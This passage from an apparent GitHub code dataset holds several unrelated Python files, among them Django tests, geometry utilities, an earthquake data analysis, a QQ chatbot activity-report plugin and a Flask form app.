plt.show()","repo_name":"deeplearning-wisc/dream-ood","sub_path":"scripts/cache/clip_plot.py","file_name":"clip_plot.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"39719760721","text":"from datetime import datetime\nfrom sqlalchemy import Column, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n\nclass Core(object):\n \"\"\"A mixin for other SQLAlchemy ORM classes. Includes a date_craeted and\n date_updated field for all database tables.\"\"\"\n date_created = Column(\n DateTime,\n default=datetime.utcnow(),\n index=True\n )\n\n date_modified = Column(\n DateTime,\n default=datetime.utcnow(),\n onupdate=datetime.utcnow(),\n index=True\n )\n\n def __iter__(self):\n for key in dir(self):\n yield (key, getattr(self, key))","repo_name":"NYPL/drb-etl-pipeline","sub_path":"model/postgres/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"35194839159","text":"import os\nfrom models import Book, Reader, Review\nfrom config import db, db_file\n\n\nif __name__ == '__main__':\n # remove old db so we can create it again \n if os.path.exists(db_file):\n os.remove(db_file)\n\n # create tables\n db.create_all()\n\n # creating test instances\n book1 = Book(title='The Hobbit',\n author='J. R. R. Tolkien',\n description='The adventures of Bilbo',\n genre='adventure',\n publisher='Allen & Unwin')\n \n book2 = Book(title='Harry Potter', \n author='J. K. 
 Rowling',\n                 description='A book about magic',\n                 genre='fantasy',\n                 publisher='Bloomsbury Publishing')\n\n    # committing tests\n    db.session.add(book1)\n    db.session.add(book2)\n    db.session.commit()\n    \n    # show one of the tests\n    print(book1,'\\n')\n\n    # show the same test but in json format\n    print(book1.json())\n\n    print('='*140,'\\n')\n\n    # creating and committing the reviewer\n    reader = Reader(name ='Vítor Otto',\n                    age = '18', \n                    profession = 'Estudante', \n                    fav_book = book1)\n\n    reader2 = Reader(name ='Carlos',\n                    age = '20', \n                    profession = 'Desempregado')\n    \n    db.session.add(reader)\n    db.session.add(reader2)\n    db.session.commit()\n    \n    print(reader,'\\n')\n    print(reader2,'\\n')\n    print(reader.json())\n    \n\n    print('='*140,'\\n')\n\n    # creating the review\n    review = Review(rating = '8.5',\n                    date = '10/11/2020',\n                    opinion = '''Esse é meu livro favorito não por causa da história, mas porque foi um presente especial''',\n                    book = book1,\n                    author = reader)\n\n    db.session.add(review)\n    db.session.commit()\n\n    print(review,'\\n')\n    print(review.json())\n    \n    print(f'\\n{review.author.name} está avaliando o livro {review.book.title}')","repo_name":"vitorueno/PGM2-2020","sub_path":"sistema-livros/back-end/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6304137025","text":"import math\nfrom decimal import Decimal\n\nfrom django.db.models import DecimalField\nfrom django.db.models.functions import Exp\nfrom django.test import TestCase\nfrom django.test.utils import register_lookup\n\nfrom ..models import DecimalModel, FloatModel, IntegerModel\n\n\nclass ExpTests(TestCase):\n    def test_null(self):\n        IntegerModel.objects.create()\n        obj = IntegerModel.objects.annotate(null_exp=Exp(\"normal\")).first()\n        self.assertIsNone(obj.null_exp)\n\n    def test_decimal(self):\n        DecimalModel.objects.create(n1=Decimal(\"-12.9\"), n2=Decimal(\"0.6\"))\n        obj = DecimalModel.objects.annotate(n1_exp=Exp(\"n1\"), n2_exp=Exp(\"n2\")).first()\n        self.assertIsInstance(obj.n1_exp, Decimal)\n        self.assertIsInstance(obj.n2_exp, Decimal)\n        self.assertAlmostEqual(obj.n1_exp, Decimal(math.exp(obj.n1)))\n        self.assertAlmostEqual(obj.n2_exp, Decimal(math.exp(obj.n2)))\n\n    def test_float(self):\n        FloatModel.objects.create(f1=-27.5, f2=0.33)\n        obj = FloatModel.objects.annotate(f1_exp=Exp(\"f1\"), f2_exp=Exp(\"f2\")).first()\n        self.assertIsInstance(obj.f1_exp, float)\n        self.assertIsInstance(obj.f2_exp, float)\n        self.assertAlmostEqual(obj.f1_exp, math.exp(obj.f1))\n        self.assertAlmostEqual(obj.f2_exp, math.exp(obj.f2))\n\n    def test_integer(self):\n        IntegerModel.objects.create(small=-20, normal=15, big=-1)\n        obj = IntegerModel.objects.annotate(\n            small_exp=Exp(\"small\"),\n            normal_exp=Exp(\"normal\"),\n            big_exp=Exp(\"big\"),\n        ).first()\n        self.assertIsInstance(obj.small_exp, float)\n        self.assertIsInstance(obj.normal_exp, float)\n        self.assertIsInstance(obj.big_exp, float)\n        self.assertAlmostEqual(obj.small_exp, math.exp(obj.small))\n        self.assertAlmostEqual(obj.normal_exp, math.exp(obj.normal))\n        self.assertAlmostEqual(obj.big_exp, math.exp(obj.big))\n\n    def test_transform(self):\n        with register_lookup(DecimalField, Exp):\n            DecimalModel.objects.create(n1=Decimal(\"12.0\"), n2=Decimal(\"0\"))\n            DecimalModel.objects.create(n1=Decimal(\"-1.0\"), n2=Decimal(\"0\"))\n            obj = DecimalModel.objects.filter(n1__exp__gt=10).get()\n            self.assertEqual(obj.n1, 
Decimal(\"12.0\"))\n","repo_name":"django/django","sub_path":"tests/db_functions/math/test_exp.py","file_name":"test_exp.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"29879030562","text":"import numpy as np\n\n\ndef is_intersect_perpendicular_point_to_line(point, line_start, line_end):\n \"\"\"\n check if perpendicular line from point to line segment intersects\n Args:\n point: point in numpy.array\n line_start: line segment start point in numpy.array\n line_end: line segment end point in numpy.array\n Returns:\n result: Bool value if perpendicular line intersects or not\n \"\"\"\n vec_start_to_point = point - line_start\n vec_start_to_end = line_end - line_start\n dot_product = np.dot(vec_start_to_point, vec_start_to_end)\n if dot_product > 0:\n norm_vec_start_to_end = np.linalg.norm(vec_start_to_end)\n projection = dot_product/norm_vec_start_to_end\n if projection < norm_vec_start_to_end:\n return True\n else:\n return False\n else:\n return False\n\n\ndef get_perpendicular_point_to_line(point, line_start, line_end):\n \"\"\"\n find the perpendicular point to line segment from point\n Args:\n point: point in numpy.array\n line_start: line segment start point in numpy.array\n line_end: line segment end point in numpy.array\n Returns:\n result: found perpendicular point to line segment in numpy.array\n \"\"\"\n vec_start_to_point = point - line_start\n vec_start_to_end = line_end - line_start\n dot_product = np.dot(vec_start_to_point, vec_start_to_end)\n norm_vec_start_to_end = np.linalg.norm(vec_start_to_end)\n projection = dot_product/norm_vec_start_to_end\n start_cross_vector = vec_start_to_end * (projection/norm_vec_start_to_end)\n return np.array([line_start[0]+start_cross_vector[0], line_start[1]+start_cross_vector[1]])\n\n\ndef get_closest_point_to_line(point, line_start, line_end):\n \"\"\"\n find the closest point on line segments from point\n reference : https://gihyo.jp/dev/serial/01/as3/0053\n Args:\n point: point in numpy.array\n line_start: line segment start point in numpy.array\n line_end: line segment end point in numpy.array\n Returns:\n result: found closest point on line segment in numpy.array\n \"\"\"\n vec_start_to_point = point - line_start\n vec_start_to_end = line_end - line_start\n dot_product = np.dot(vec_start_to_point, vec_start_to_end)\n if dot_product > 0:\n norm_vec_start_to_end = np.linalg.norm(vec_start_to_end)\n projection = dot_product/norm_vec_start_to_end\n if projection < norm_vec_start_to_end:\n start_cross_vector = vec_start_to_end * (projection/norm_vec_start_to_end)\n return np.array([line_start[0]+start_cross_vector[0], line_start[1]+start_cross_vector[1]])\n else:\n return np.copy(line_end)\n else:\n return np.copy(line_start)\n\n\ndef get_distance_to_queue_head(queue_expected_path_segment_idx, queue_expected_path_point, queue_expected_path_line_segments, queue_expected_path_line_segments_length):\n \"\"\"\n calculate distance from a point along queue expected path to head point of queue expected path\n Args:\n queue_expected_path_segment_idx: segment of queue expected path which is closest to input point\n queue_expected_path_point: input point on queue expected path\n queue_expected_path_line_segments: line segments of queue expected path\n queue_expected_path_line_segments_length: line segments length of queue expected path\n Returns:\n result: distance from input point to head point of queue expected path\n \"\"\"\n dist = 0.0\n 
for segment_idx in range(queue_expected_path_segment_idx, len(queue_expected_path_line_segments)):\n        if segment_idx == queue_expected_path_segment_idx:\n            dist += np.linalg.norm(queue_expected_path_line_segments[segment_idx][1]-queue_expected_path_point)\n        else:\n            dist += queue_expected_path_line_segments_length[segment_idx]\n    return dist\n","repo_name":"CMU-cabot/cabot-navigation","sub_path":"queue_utils_py/queue_utils_py/geometry_utils.py","file_name":"geometry_utils.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23590571899","text":"# Author: Darshan Ghorpade\n# Location: Earth\n# Date: 24/03/2022\n\n# Quick quiz\n# Q. Write a python program to print the content of a list using a while loop.\n\n# Take a list\nfruits = ['Banana', 'Watermelon', 'Mango', 'Apple', 'Pineapple', 'Grapes', 'Pomegranate', 'Papaya', 'Mudapple']\n\n# Initialise i to 0\ni = 0\n\n# Using while loop\nwhile i < len(fruits):\n    print(fruits[i])\n    i += 1\nnoms = noms[noms >= 4]\nseisme_data = seisme_big[seisme_big['pays'].isin(noms.index)]\nprint(seisme_data)\nseaborn.boxplot(data=seisme_data, x=\"pays\", y='mag', orient=\"v\", dodge=False)\nplt.xticks(rotation=90)\nplt.show()\n\n# 4b\nseisme_max_mag_loc = seisme.groupby('pays')['mag'].idxmax()\nseisme_max_mag_eq = seisme.loc[seisme_max_mag_loc]\nseisme_mag_6 = seisme_max_mag_eq.sort_values('mag', ascending=False).head(6)\n#seisme_mag_data = seisme[seisme['mag'].isin(seisme_mag.index)]\nprint(\"6 lieux du monde qui enregistre la plus forte magnitude: \")\nprint(seisme_mag_6[['pays', 'mag']])\n\n# 4c\nseisme_californie_alaska = list()\nseisme_californie_alaska.append(seisme[(seisme['pays'] == 'Alaska') & (seisme[\"mag\"] <= 2)])\nseisme_californie_alaska.append(seisme[(seisme['pays'] == 'California') & (seisme[\"mag\"] <= 2)])\nprint(seisme_californie_alaska)\n\n\n# Étude supplémentaire de la relation entre profondeur et magnitude :\ndata = seisme[['mag', 'profondeur']]\nfig = px.scatter(data, y='mag', x='profondeur')\nfig.update_layout(title='Magnitude en fonction de la profondeur')\nfig.show()\n\n\n#Construction d'un tableau de contingence :\n\ntableau = pd.crosstab(data['profondeur'], data['mag'])\n\n#On applique le test d'indépendance Khi-deux sur le tableau de contingence :\n\nstatistique, p_value, _, _ = chi2_contingency(tableau)\nprint(\"Statistique du test Khi-2 : \", statistique)\nprint(\"P-value : \", p_value)\n\n# Calcul de l'odds ratio du tableau de contingence :\n\nodds_ratio = tableau.apply(lambda row: row / row.sum(), axis=1)\nprint(\"Tableau des odds-ratio :\")\nprint(odds_ratio)","repo_name":"PaulAdrPENET/projmaths","sub_path":"lecture.py","file_name":"lecture.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27123012740","text":"from utils.basicConfigs import ROOT_PATH, SAVE_TMP_PATH, sqlConfig, BOT_SELF_QQ\nfrom utils.basicEvent import send, warning, startswith_in, get_avatar_pic, get_group_avatar_pic\nfrom typing import Union, Tuple, Any, List, Optional\nfrom utils.standardPlugin import StandardPlugin\nfrom PIL import Image, ImageDraw, ImageFont\nfrom utils.sqlUtils import newSqlSession, mysql\nfrom utils.responseImage_beta import *\nimport matplotlib.pyplot as plt\nimport datetime\nfrom copy import deepcopy\nfrom io import BytesIO\nimport re\nimport random\n\nBOT_CMD = [ '-ddl','-canvas','-uag','签到','祈愿',\n            '-help','-st','-lib','-hs','-mdd',\n            '-jwc','-dekt','-mc','-sjmc','-fdc',\n            '-xjtumc', '-mcs',
 '-xjmclive',\n                '-tjmc','-mclive','-sjmclive',\n                '-fdmclive','小马,','小🦄,',\n                '小马,','小🦄,','-mycoins','-mytrans',\n                '新闻', '-sjtu news', '交大新闻',\n                '来点图图',\n                '决斗','接受决斗','ttzf','izf',\n                '-myact', '-wc', '-actrank','-bwc',\n                '-bwrs','-bdrs','-zhrs', '-actclear',\n                '-lxq', '执黑下象棋', '问答帮助', '猜单词', '-wordle',\n                '猜成语','-handle',]\n\nclass ActReportPlugin(StandardPlugin): \n    def judgeTrigger(self, msg:str, data:Any) -> bool:\n        return msg == '-myact' and data['message_type'] == 'group'\n    def executeEvent(self, msg:str, data:Any) -> Union[None, str]:\n        imgPath = getMyActivity(data['user_id'], data['group_id'])\n        if imgPath == None:\n            send(data['group_id'], '[CQ:reply,id=%d]生成失败'%data['message_id'], data['message_type'])\n        else:\n            imgPath = imgPath if os.path.isabs(imgPath) else os.path.join(ROOT_PATH, imgPath)\n            send(data['group_id'], '[CQ:image,file=files:///%s]'%imgPath, data['message_type'])\n        return \"OK\"\n    def getPluginInfo(self, )->Any:\n        return {\n            'name': 'ActReport',\n            'description': '我的水群报告',\n            'commandDescription': '-myact',\n            'usePlace': ['group', ],\n            'showInHelp': True,\n            'pluginConfigTableNames': [],\n            'version': '1.0.0',\n            'author': 'Unicorn',\n        }\n\nclass ActRankPlugin(StandardPlugin):\n    def judgeTrigger(self, msg:str, data:Any) -> bool:\n        return msg == '-actrank' and data['message_type'] == 'group' \n    def executeEvent(self, msg:str, data:Any) -> Union[None, str]:\n        imgPath = getGroupActivityRank(data['group_id'])\n        if imgPath == None:\n            send(data['group_id'], '[CQ:reply,id=%d]生成失败'%data['message_id'], data['message_type'])\n        else:\n            imgPath = imgPath if os.path.isabs(imgPath) else os.path.join(ROOT_PATH, imgPath)\n            send(data['group_id'], '[CQ:image,file=files:///%s]'%imgPath, data['message_type'])\n        return \"OK\"\n    def getPluginInfo(self, )->Any:\n        return {\n            'name': 'ActRank',\n            'description': '水群排行榜',\n            'commandDescription': '-actrank',\n            'usePlace': ['group', ],\n            'showInHelp': True,\n            'pluginConfigTableNames': [],\n            'version': '1.0.0',\n            'author': 'Unicorn',\n        } \n    \ndef getMyActivity(user_id:int, group_id:int)->Optional[str]:\n    \"\"\"生成并绘制水群报告\n    @user_id: 用户QQ\n    @group_id: 群\n\n    @return:\n        if str: 生成成功,返回图片存储地址\n        elif None: 生成失败\n    \"\"\"\n    messageNumber = 0\n    messageWithBotNumber = 0\n    messageDescript = ''\n    messageMedal = []\n    messageWithBotMedal = []\n    messageImgEmjMedal = []\n    try:\n        mydb, mycursor = newSqlSession()\n        mycursor.execute(\"SELECT message_seq from `clearChatLog` where user_id = %d and group_id = %d\"%(user_id, group_id))\n        result=list(mycursor)\n        minSeq = None if len(result) == 0 else result[0][0]\n        if minSeq == None:\n            mycursor.execute(\"SELECT time, message FROM messageRecord where user_id=%d and group_id=%d\"%(user_id, group_id))\n        else:\n            mycursor.execute(\"SELECT time, message FROM messageRecord where user_id=%d and group_id=%d and message_seq > %d\"%(user_id, group_id, minSeq))\n\n        result=list(mycursor)\n        # 消息数量\n        messageNumber = len(result)\n        # 消息-时间图\n        time_mes = {}\n        time_meswithbot = {}\n        time_meswithimgemoji = {} #图片类动画表情\n        st:datetime.datetime = result[0][0]\n        et:datetime.datetime = result[-1][0]\n        for time, message in result:\n            time: datetime.datetime\n            message: str\n            message = message.strip()\n            t = time.strftime('%Y-%m-%d')\n            y = time_mes.get(t,0)\n            y += 1\n            time_mes[t] = y\n            if startswith_in(message.strip(),BOT_CMD):\n                y = time_meswithbot.get(t,0)\n                y += 1\n                time_meswithbot[t] = y\n            # pattern= re.compile(r'^\\[CQ\\:image\\,file.*subType\\=1\\,.*\\]')\n            if ('[CQ:image,file' in message and 'subType=1' in message):\n                y = time_meswithimgemoji.get(t,0)\n
                y += 1\n                time_meswithimgemoji[t] = y\n        ct:datetime.datetime = deepcopy(st)\n        while (ct<et):\n            ct += datetime.timedelta(days=1)\n            if ct>datetime.datetime.now():\n                break\n            t = ct.strftime('%Y-%m-%d')\n            y = time_mes.get(t,0)\n            if y==0:\n                time_mes[t] = 0\n            y = time_meswithbot.get(t,0)\n            if y==0:\n                time_meswithbot[t] = 0\n            y = time_meswithimgemoji.get(t,0)\n            if y==0:\n                time_meswithimgemoji[t] = 0\n        # sorted(time_mes.keys())\n        x_list = list(time_mes.keys())\n        y_list = list(time_mes.values())\n        x_list = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in x_list]\n        # 消息最多的天\n        y_max = max(y_list)\n        x_max = x_list[y_list.index(y_max)].strftime('%Y 年 %m 月 %d 日')\n        # 平均消息\n        y_avg = messageNumber / (int((et.date()-st.date()).days)+1)\n        if (y_max <= 5):\n            messageDescript = '你是本群的潜水员,日最多发送信息少于 5 条'\n            messageMedal.append('🎖️资深潜水')\n        else:\n            if y_avg<15:\n                messageDescript = '你在本群低调内敛,平均每日发送信息 %.2f 条'%(y_avg)\n            elif y_avg<50:\n                messageDescript = '你在本群比较活跃,平均每日发送信息 %.2f 条'%(y_avg)\n            else:\n                messageDescript = '你在本群侃侃而谈,平均每日发送信息 %.2f 条'%(y_avg)\n                messageMedal.append('🎖️水群大师')\n            messageDescript += '\\n%s,你一共发送了 %d 条信息'%(x_max, y_max)\n        if messageNumber >=3000:\n            messageMedal.append('🎖️活跃元老')\n        elif y_max >=300:\n            messageMedal.append('🎖️谈天说地')\n\n        plt.figure(figsize=(10, 3)) \n        plt.bar(x_list, y_list, color='#87CEEB')\n        ax = plt.gca()\n        ax.set_facecolor('#E8F8FF')\n        plt.xticks(rotation=25,size=9)\n        time_dis_path = BytesIO()\n        plt.margins(0.002, 0.1)\n        plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n        plt.savefig(time_dis_path, dpi=200, bbox_inches='tight')\n        card_content1 = [\n            ('subtitle','共发送信息 %d 条\\n'%(messageNumber),PALETTE_SJTU_BLUE),\n            ('separator',),\n            ('illustration', time_dis_path),\n            ('body', messageDescript)\n        ]\n        if len(messageMedal) > 0:\n            card_content1.append(('subtitle', ' '.join(messageMedal), PALETTE_SJTU_BLUE))\n\n        # Bot互动-时间图\n        x_list = list(time_meswithbot.keys())\n        y_list = list(time_meswithbot.values())\n        x_list = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in x_list]\n        messageWithBotNumber = sum(y_list)\n\n        # Bot互动-奖章\n        if (messageWithBotNumber>=500):\n            messageWithBotMedal.append('🎖️高级测试工程师')\n        elif (messageWithBotNumber>=200):\n            messageWithBotMedal.append('🎖️中级测试工程师')\n        elif (messageWithBotNumber>=50):\n            messageWithBotMedal.append('🎖️初级测试工程师')\n        if (messageWithBotNumber / messageNumber > 0.4):\n            messageWithBotMedal.append('🎖️信息熵操纵者')\n        plt.figure(figsize=(10, 3)) \n        plt.bar(x_list, y_list, color='#F8AC51')\n        ax = plt.gca()\n        ax.set_facecolor('#FFEFDD')\n        plt.xticks(rotation=25,size=9)\n        time_dis2_path = BytesIO()\n        plt.margins(0.002, 0.1)\n        plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n        plt.savefig(time_dis2_path, dpi=200, bbox_inches='tight')\n        card_content2 = [\n            ('subtitle','与小🦄共互动 %d 次\\n'%(messageWithBotNumber),PALETTE_SJTU_ORANGE),\n            ('separator',),\n            ('illustration', time_dis2_path)\n        ]\n        if len(messageWithBotMedal) > 0:\n            card_content2.append(('subtitle', ' '.join(messageWithBotMedal), PALETTE_SJTU_ORANGE))\n        \n        # 图片信息-时间图\n        x_list = list(time_meswithimgemoji.keys())\n        y_list = list(time_meswithimgemoji.values())\n        x_list = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in x_list]\n        messageImgEmojiNumber = sum(y_list)\n        if (messageImgEmojiNumber>=500):\n            messageImgEmjMedal.append('🎖️表情包之神')\n        plt.figure(figsize=(10, 3)) \n        plt.bar(x_list, y_list, color='#7DC473')\n        ax = plt.gca()\n        ax.set_facecolor('#E5FBE2')\n        plt.xticks(rotation=25,size=9)\n        time_dis3_path = BytesIO()\n        plt.margins(0.002, 0.1)\n        plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0) \n    
plt.savefig(time_dis3_path, dpi=200, bbox_inches='tight')\n plt.close()\n card_content3 = [\n ('subtitle','共发送动画表情 %d 次\\n'%(messageImgEmojiNumber),PALETTE_SJTU_GREEN),\n ('separator',),\n ('illustration', time_dis3_path)\n ]\n if len(messageImgEmjMedal) > 0:\n card_content3.append(('subtitle', ' '.join(messageImgEmjMedal), PALETTE_SJTU_GREEN))\n\n img_avatar = Image.open(BytesIO(get_avatar_pic(user_id)))\n # 生成卡片图\n ActCards = ResponseImage(\n titleColor = PALETTE_SJTU_BLUE,\n title = '我的水群报告',\n layout = 'normal',\n width = 880,\n cardBodyFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 24),\n cardSubtitleFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 30),\n )\n ActCards.addCardList([\n ResponseImage.RichContentCard(\n raw_content=[\n ('subtitle','ID : %d'%(user_id)),\n ('separator',),\n ('keyword','群 : %d'%(group_id))\n ],\n icon = img_avatar\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content1\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content2\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content3\n )\n ])\n save_path = (os.path.join(SAVE_TMP_PATH, f'{user_id}_{group_id}_actReport.png'))\n ActCards.generateImage(save_path)\n return save_path\n except mysql.connector.Error as e:\n warning(\"mysql error in getMyActivity: {}\".format(e))\n except BaseException as e:\n warning(\"error in getMyActivity: {}\".format(e))\n\ndef getGroupActivityRank(group_id:int)->Optional[str]:\n \"\"\"生成并绘制水群排行\n @group_id: 群号\n \n @return:\n if str: 生成成功,返回图片存储地址\n elif None: 生成失败\n \"\"\"\n try:\n mydb, mycursor = newSqlSession()\n # 获取群里删除过act的人数\n mycursor.execute('select count(*) from `clearChatLog` where group_id=%d'%group_id)\n queryPeopleNum = list(mycursor)[0][0] + 15\n # mycursor.execute(\"SELECT ANY_VALUE(nickname), ANY_VALUE(card), user_id, COUNT(*) FROM messageRecord WHERE group_id=%d and user_id!=%d GROUP BY user_id ORDER BY COUNT(user_id) DESC LIMIT 15;\"%(group_id, BOT_SELF_QQ))\n randNum = random.randint(1e9, 1e10-1)\n tempTableName = 'actRank_'+str(randNum)+'_'+str(group_id)\n tempProcName = 'getNick_'+str(randNum)+'_'+str(group_id)\n mycursor.execute('drop temporary table if exists %s'%(tempTableName))\n mycursor.execute(\"\"\"\n create temporary table %s \n select user_id as u, count(*) as c from `messageRecord` \n where group_id=%d and user_id != %d group by user_id\n order by count(user_id) desc limit %d\"\"\"%(tempTableName, group_id, BOT_SELF_QQ, queryPeopleNum))\n mycursor.execute(\"alter table %s add column n varchar(50)\"%(tempTableName))\n mycursor.execute(\"drop procedure if exists %s\"%tempProcName)\n mycursor.execute(\"\"\"create procedure %s()\n begin\n declare nick varchar(50);\n declare uid bigint unsigned;\n declare cleared bool;\n declare done bool default false;\n declare cur cursor for select u from %s;\n declare continue handler for sqlstate '02000' set done = true;\n open cur;\n repeat\n fetch cur into uid;\n select if(card = '', nickname, card) into nick\n FROM `messageRecord` \n WHERE message_seq = ( \n select max(message_seq) from `messageRecord` \n where user_id = uid and group_id = %d\n ) and group_id = %d;\n update %s set n = nick where u = uid;\n \n select count(*) > 0 from `clearChatLog` \n where group_id = %d and user_id = uid into cleared;\n if cleared then\n update %s set c = (\n select count(*) from messageRecord \n where group_id = %d and user_id = uid and message_seq > (\n select `message_seq` from `clearChatLog`\n where group_id = %d and user_id 
= uid\n )\n )where u = uid;\n end if;\n\n until done = true\n end repeat;\n close cur;\n end; \"\"\"%(tempProcName, tempTableName, group_id, group_id, tempTableName,\n group_id, tempTableName, group_id, group_id))\n mycursor.execute(\"call %s()\"%tempProcName)\n mycursor.execute(\"select n, u, c from %s\"%(tempTableName))\n result=list(mycursor)\n result = sorted(result, key=lambda x:x[2], reverse=True)[:15]\n card_content = []\n max_num = result[0][2]\n for index, (nickname, user_id, count) in enumerate(result):\n text = \"%d. %s : %d条\"%(index+1, nickname, count)\n if index <= 3:\n card_content.append(('subtitle',text))\n card_content.append(('progressBar', count/max_num, PALETTE_ORANGE, PALETTE_LIGHTORANGE))\n else:\n card_content.append(('body',text))\n card_content.append(('progressBar', count/max_num, PALETTE_GREEN, PALETTE_LIGHTGREEN))\n\n img_avatar = Image.open(BytesIO(get_group_avatar_pic(group_id)))\n ActRankCards = ResponseImage(\n titleColor = PALETTE_SJTU_BLUE,\n title = '水群排行榜',\n footer = '* 数据统计仅包含小🦄1.0.0版本更新后群内消息',\n layout = 'normal',\n width = 880,\n cardSubtitleFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 27),\n cardBodyFont= ImageFont.truetype(os.path.join(FONTS_PATH, 'SourceHanSansCN-Medium.otf'), 24),\n )\n ActRankCards.addCardList([\n ResponseImage.RichContentCard(\n raw_content=[\n ('keyword','群 : %d'%(group_id)),\n ('separator',),\n ('subtitle','截至 : '+datetime.datetime.strftime(datetime.datetime.now(),'%Y-%m-%d %H:%M:%S'))\n ],\n icon = img_avatar\n ),\n ResponseImage.RichContentCard(\n raw_content = card_content\n )\n ])\n save_path = (os.path.join(SAVE_TMP_PATH, f'{group_id}_actRank.png'))\n ActRankCards.generateImage(save_path)\n return save_path\n except mysql.connector.Error as e:\n warning(\"mysql error in getGroupActivityRank: {}\".format(e))\n except BaseException as e:\n warning(\"error in getGroupActivityRank: {}\".format(e))","repo_name":"UNIkeEN/Little-UNIkeEN-Bot","sub_path":"plugins/groupActReport.py","file_name":"groupActReport.py","file_ext":"py","file_size_in_byte":16843,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"30169023481","text":"# -*- coding: utf-8 -*-\nimport csv\nfrom itertools import chain\nimport logging\nfrom datetime import datetime\nimport re\nfrom unidecode import unidecode\nfrom optparse import make_option\nfrom django.core.management import BaseCommand\nfrom django.conf import settings\nfrom territori.models import Territorio, Incarico\n\n__author__ = 'stefano'\n\n\ndef dump(qs, outfile_path):\n # \"\"\"\n # Takes in a Django queryset and spits out a CSV file.\n #\n # Usage::\n #\n # \t>> from utils import dump2csv\n # \t>> from dummy_app.models import *\n # \t>> qs = DummyModel.objects.all()\n # \t>> dump2csv.dump(qs, './data/dump.csv')\n #\n # Based on a snippet by zbyte64::\n #\n # \thttp://www.djangosnippets.org/snippets/790/\n #\n # \"\"\"\n\n model = qs.model\n writer = csv.writer(open(outfile_path, 'w'))\n\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n writer.writerow(headers)\n\n for obj in qs:\n row = []\n for field in headers:\n val = getattr(obj, field)\n if callable(val):\n val = val()\n if type(val) == unicode:\n val = val.encode(\"utf-8\")\n row.append(val)\n writer.writerow(row)\n\n\nclass Command(BaseCommand):\n\n accepted_types = ['all', 'capoluoghi', 'others']\n\n option_list = BaseCommand.option_list + (\n\n make_option('--territori', '-t',\n dest='territori',\n 
action='store',\n default='all',\n help='Type of Territorio: ' + ' | '.join(accepted_types)),\n\n make_option('--output', '-o',\n dest='output_file',\n action='store',\n default='',\n help='Path to output file + filename', ),\n\n make_option('--dry-run',\n dest='dryrun',\n action='store_true',\n default=False,\n help='Set the dry-run command mode: nothing is written on db'),\n\n )\n\n help = 'Export political charges into csv file'\n logger = logging.getLogger('management')\n\n def handle(self, *args, **options):\n verbosity = options['verbosity']\n if verbosity == '0':\n self.logger.setLevel(logging.ERROR)\n elif verbosity == '1':\n self.logger.setLevel(logging.WARNING)\n elif verbosity == '2':\n self.logger.setLevel(logging.INFO)\n elif verbosity == '3':\n self.logger.setLevel(logging.DEBUG)\n\n dryrun = options['dryrun']\n territori_type = options['territori']\n output_file = options['output_file']\n\n if output_file == '':\n self.logger.error(u\"Output file path is required\")\n return\n\n self.logger.info(u\"Start charges export with dryrun: {0}\".format(dryrun))\n self.handle_export(territori_type, output_file, dryrun)\n self.logger.info(u\"End import charges script\")\n\n def handle_export(self, territori_type, output_file, dryrun):\n\n # prende tutte le citta' capoluogo di provincia\n capoluoghi_provincia = Territorio.objects.\\\n filter(slug__in=settings.CAPOLUOGHI_PROVINCIA).\\\n order_by('-cluster', 'denominazione')\n altri_territori = list(\n Territorio.objects.filter(territorio=Territorio.TERRITORIO.C).\n exclude(id__in=capoluoghi_provincia).\n order_by('-cluster', 'denominazione'))\n\n\n # depending on the territori_type value runs the import only for capoluoghi di provincia or for all Territori\n # prioritize the territori list getting first the capoluoghi di provincia and then all the rest\n\n if territori_type == 'capoluoghi':\n self.export_incarichi(capoluoghi_provincia, output_file, dryrun)\n\n if territori_type == 'others':\n self.export_incarichi(altri_territori, output_file, dryrun)\n\n if territori_type == 'all':\n all_territori = sorted(\n chain(capoluoghi_provincia, altri_territori, ),\n key=lambda instance: instance.denominazione)\n\n self.export_incarichi(all_territori, output_file, dryrun)\n\n def export_incarichi(self, territori_set, output_file, dryrun):\n\n # export to csv incarichi for territorio\n queryset = Incarico.objects.filter(territorio__in=territori_set).order_by('territorio__denominazione')\n dump(qs=queryset, outfile_path=output_file)\n\n\n\n\n","repo_name":"DeppSRL/open_bilanci","sub_path":"bilanci_project/territori/management/commands/export_incarichi.py","file_name":"export_incarichi.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"13058958209","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/result', methods=['POST'])\ndef display_result():\n name = request.form['name']\n location = request.form['location']\n fav_lang = 